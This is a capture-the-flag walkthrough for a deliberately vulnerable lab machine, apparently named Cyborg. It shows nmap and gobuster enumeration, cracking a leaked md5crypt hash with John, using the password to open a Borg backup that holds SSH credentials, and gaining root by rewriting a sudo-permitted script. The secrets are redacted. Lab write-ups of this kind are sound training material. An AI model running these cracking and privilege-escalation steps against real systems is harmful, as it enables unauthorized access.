As per usual, I'm going to write down the easy stuff and omit the answers. However, I'm going to skip the first three questions and go directly for compromising the system. Oh, I forgot one thing, though: Aside for the usual arsenal that Kali provides, we'll need to install something that's called 'borgbackup'. You'll understand why soon enough.
#1 What is the user.txt flag?
Okay, for the beginning let's throw in the obligatory NMAP scan:
$ nmap -sC -sV -oN nmap/initial <ip> Nmap scan report for <ip> Host is up (0.062s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA) | 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA) |_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Okay, so we get port 22 and 80 opened. Let's ignore the ssh for now and look what port 80 is hiding... We bust out our beloved go/dirbuster and take a peek:
$ gobuster dir -u http://10.10.101.55/ -w /usr/share/wordlists/dirb/common.txt -x py,php
And we get...
[...] /admin (Status: 301) /etc (Status: 301) /index.html (Status: 200) /server-status (Status: 403)
Huh. /admin and /etc. Neat!
Okay, so... /admin reveals a simple blog page that after a quick examination doesn't reveal much of anything, but a simple page that's not powered by Wordpress. Maybe a dead end? A closer examination, however, gives us a link to archive.tar. Let's download that and see if we can use that.
$ wget <ip>/admin/archive.tar
and un-tar it with a quick 'tar -xf archive.tar' and look through the folders.
Looking closer into one of the number files gives us this:
home/field/dev/final_archive/data/0$ xxd -c8 1 00000000: 424f 5247 5f53 4547 BORG_SEG 00000008: 40f4 3c25 0900 0000 @.<%.... 00000010: 02 .
What the heck is a BORG_SEG file? Quick Google reveals us that belongs to an archival tool named Borg. Okay. So, let's see what's in it!
home/field/dev/final_archive$ borg info --last 5 /home/by7e_/ctf/thm/cyborg/home/field/dev/final_archive/ Enter passphrase for key home/field/dev/final_archive:
Rats. We don't have a password.
We still have an undiscovered item on the site... Stuff that's dwelling in /etc. Let's look at that one...
Closer examination of the folder itself tells us it's a Squid (mis)configuration. We can find a passwd in the folder, and it looks like it's sporting a shadow password. And since we don't have the counterpart let's make a fake one!
$ echo "music_archive:x:1000:1000:music_archive,,,:/home/music_archive:/bin/bash" > passwd $ echo "music_archive:[redacted]" > shadow
And with that...
$ unshadow passwd shadow > crackme.pwd
With that ready, we feed the file to our hungry John.
$ john crackme.pwd --wordlist=/path/to/your/rockyou/list
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3]) [redacted] (music_archive) Session completed
A quick test against the server's ssh tells us these are invalid credentials for it. But we have something else to use it against, right?
home/field/dev/final_archive$ borg info --last 5 home/field/dev/final_archive/ Enter passphrase for key home/field/dev/final_archive:
Enter passphrase for key /home/by7e_/ctf/thm/cyborg/home/field/dev/final_archive: Archive name: music_archive Archive fingerprint: f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82 Comment: Hostname: ubuntu Username: root Time (start): Tue, 2020-12-29 15:00:38 Time (end): Tue, 2020-12-29 15:00:38 Duration: 0.14 seconds Number of files: 97 Command line: ./borg create /home/field/dev/final_archive::music_archive /home/alex Utilization of maximum supported archive size: 0% ------------------------------------------------------------------------------ Original size Compressed size Deduplicated size This archive: 1.49 MB 1.49 MB 1.50 MB All archives: 1.52 MB 1.50 MB 1.50 MB Unique chunks Total chunks Chunk index: 99 99
Got em! Um... x2. Yeah! That's it!
$ borg extract home/field/dev/final_archive::music_archive Enter passphrase for key home/field/dev/final_archive:
gives us... Lot more files to work with. Great. A quick find gives us a few interesting files to look at:
home/alex$ find . [...] ./Documents ./Documents/note.txt [...] ./Desktop ./Desktop/secret.txt ./.bashrc ./.bash_logout ./.profile
home/alex$ cat ./Desktop/secret.txt shoutout to all the people who have gotten to this stage whoop whoop!"
home/alex$ cat ./Documents/note.txt Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down! alex:[expunged]
Nice. And a quick ssh with those credentials gives us access to the machine, and a
home/alex$ cat user.txt
Great! One down, one to go!
#2 What is the root.txt flag?
Hm... A quick ps -aux reveals nothing special to us. No service that'd run for us to gain root. What about...
$ sudo -l Matching Defaults entries for alex on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alex may run the following commands on ubuntu: (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
We check the ownership of the file with
alex@ubuntu:~$ ls -al /etc/mp3backups/backup.sh -r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh
Ha! We are the owner! This will be super easy! With a quick nano /etc/mp3backups/backup.sh we change the contents of the file to
#!/bin/bash /bin/bash -c bash exit
We save, and... Permission denied? What?
$ chmod 777 /etc/mp3backups/backup.sh
We retry editing and run it, and -- we're root!
$ cat /root/root.txt
And that's it!